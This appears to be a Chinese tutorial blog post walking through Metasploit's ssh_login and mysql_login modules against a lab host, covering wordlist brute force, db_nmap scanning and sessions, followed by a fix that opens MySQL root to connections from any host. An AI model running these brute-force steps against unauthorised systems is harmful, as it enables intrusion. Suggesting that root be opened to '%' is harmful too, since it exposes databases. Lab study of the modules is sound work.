msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法

本文主要是介绍msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

3.ssh_login攻击(ssh_login模块的使用)

3.1搜索ssh_login模块
  search ssh_login搜索模块

3.2进入并使用模块
 use 0(这里0表示前面的编号)

3.3查看需要设置的参数
 show options

yes表示必要设置的参数

no表示可以设置也可以不用设置的参数

3.4 设置RHOSTS参数
 set RHOSTS 192.168.251.139

3.5设置用户名密码的字典
  cd /optlsmkdir dictlscd /dictvim username.txtvim password.txt

3.6设置USER_fILE和 pass_fILE参数
  set uSER_fILE /opt/dict/username.txtset pass_fILE /opt/dict/password.txt这里不区分大小写

我这里仅仅只使用了username.txt,修改一下

3.7 run启动命令
 run

3.8 sessions查看启动成功后创建的session
 sessions

3.9 进入靶机
 sessions -i 1(1表示前面的id)

3.10进入靶机成功后尝试敲一些基础命令验证石佛偶进入靶机
 pwdwhoamiexit

表示进入靶机成功

4.mysql_login攻击(mysql_login模块的使用)

4.1 db_nmap -sP 192.168.251.0/24的用法
  db_nmap -sP 192.168.251.0/24将查询到的结果存入到数据库中

4.2 IP地址查询
 hosts地址查询

4.3 查询地址开放的端口号
  db_nmap -sS 192.168.251.139(IP地址)查询地址开放的端口号并将其写入到数据库中

4.4 将C段结果放入到数据库中
  db_nmap -Pn -sV 192.168.251.139

但是这里出现了报错,经过一系列排查后发现是数据库的原因,是由于数据库没有打开,按照上面开启数据库的办法将数据库打开就ok了

重新运行

出现这个表明运行成功

4.5 使用services查看IP地址所开放的端口
 services

4.6 查询mysql_login 模块
  search mysql_login

4.7 使用模块
 use 0

4.8 show options查询可以修改的参数
 show options

4.9设置密码
 set password 123456789

4.10 设置靶机IP地址
 set rhosts 192.168.251.1

4.11 run运行
 run

这里没有运行成功

排查问题后发现是数据库不能远程连接,为什么连接不上呢?

原因

(1) MySQL建用户的时候会指定一个host,默认是127.0.0.1/localhost只能本机访问;

(2) 其它机器用这个用户帐号访问会提示没有权限

4.12 解决办法
4.12.1 进入MySQL数据库
 mysql -u root -pEnter password:输入你的密码

4.12.2 进入mysql库
 use mysql

4.12.3 查看用户
 select host,user from user;
4.12.4 修改host

修改host原因: %为任意用户都有权限连接,localhost为只能本机连接,配置完host为%这一步就已经能外网访问了

  update user set host='%' where user='root';

4.12.5 修改成功后重新查看数据库信息
 select host,user from user;

修改成功

4.13 再次run运行
 run

4.14 查看数据库里面收集的信息
 creds

这里查询到了我们刚刚对数据库的操作

这篇关于msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/797534

相关文章

MySQL字符串转数值的方法全解析

《MySQL字符串转数值的方法全解析》在MySQL开发中,字符串与数值的转换是高频操作,本文从隐式转换原理、显式转换方法、典型场景案例、风险防控四个维度系统梳理,助您精准掌握这一核心技能,需要的朋友可... 目录一、隐式转换:自动但需警惕的&ld编程quo;双刃剑”二、显式转换:三大核心方法详解三、典型场景

MySQL中between and的基本用法、范围查询示例详解

《MySQL中betweenand的基本用法、范围查询示例详解》BETWEENAND操作符在MySQL中用于选择在两个值之间的数据,包括边界值,它支持数值和日期类型,示例展示了如何使用BETWEEN... 目录一、between and语法二、使用示例2.1、betwphpeen and数值查询2.2、be

python中的flask_sqlalchemy的使用及示例详解

《python中的flask_sqlalchemy的使用及示例详解》文章主要介绍了在使用SQLAlchemy创建模型实例时,通过元类动态创建实例的方式,并说明了如何在实例化时执行__init__方法,... 目录@orm.reconstructorSQLAlchemy的回滚关联其他模型数据库基本操作将数据添

Spring配置扩展之JavaConfig的使用小结

《Spring配置扩展之JavaConfig的使用小结》JavaConfig是Spring框架中基于纯Java代码的配置方式,用于替代传统的XML配置,通过注解(如@Bean)定义Spring容器的组... 目录JavaConfig 的概念什么是JavaConfig?为什么使用 JavaConfig?Jav

MySQL快速复制一张表的四种核心方法(包括表结构和数据)

《MySQL快速复制一张表的四种核心方法(包括表结构和数据)》本文详细介绍了四种复制MySQL表(结构+数据)的方法,并对每种方法进行了对比分析,适用于不同场景和数据量的复制需求,特别是针对超大表(1... 目录一、mysql 复制表(结构+数据)的 4 种核心方法(面试结构化回答)方法 1:CREATE

JavaWeb项目创建、部署、连接数据库保姆级教程(tomcat)

《JavaWeb项目创建、部署、连接数据库保姆级教程(tomcat)》:本文主要介绍如何在IntelliJIDEA2020.1中创建和部署一个JavaWeb项目,包括创建项目、配置Tomcat服务... 目录简介:一、创建项目二、tomcat部署1、将tomcat解压在一个自己找得到路径2、在idea中添加

Java使用Spire.Doc for Java实现Word自动化插入图片

《Java使用Spire.DocforJava实现Word自动化插入图片》在日常工作中,Word文档是不可或缺的工具,而图片作为信息传达的重要载体,其在文档中的插入与布局显得尤为关键,下面我们就来... 目录1. Spire.Doc for Java库介绍与安装2. 使用特定的环绕方式插入图片3. 在指定位

Springboot3 ResponseEntity 完全使用案例

《Springboot3ResponseEntity完全使用案例》ResponseEntity是SpringBoot中控制HTTP响应的核心工具——它能让你精准定义响应状态码、响应头、响应体,相比... 目录Spring Boot 3 ResponseEntity 完全使用教程前置准备1. 项目基础依赖(M

Java使用Spire.Barcode for Java实现条形码生成与识别

《Java使用Spire.BarcodeforJava实现条形码生成与识别》在现代商业和技术领域,条形码无处不在,本教程将引导您深入了解如何在您的Java项目中利用Spire.Barcodefor... 目录1. Spire.Barcode for Java 简介与环境配置2. 使用 Spire.Barco

SQL Server中行转列方法详细讲解

《SQLServer中行转列方法详细讲解》SQL行转列、列转行可以帮助我们更方便地处理数据,生成需要的报表和结果集,:本文主要介绍SQLServer中行转列方法的相关资料,需要的朋友可以参考下... 目录前言一、为什么需要行转列二、行转列的基本概念三、使用PIVOT运算符进行行转列1.创建示例数据表并插入数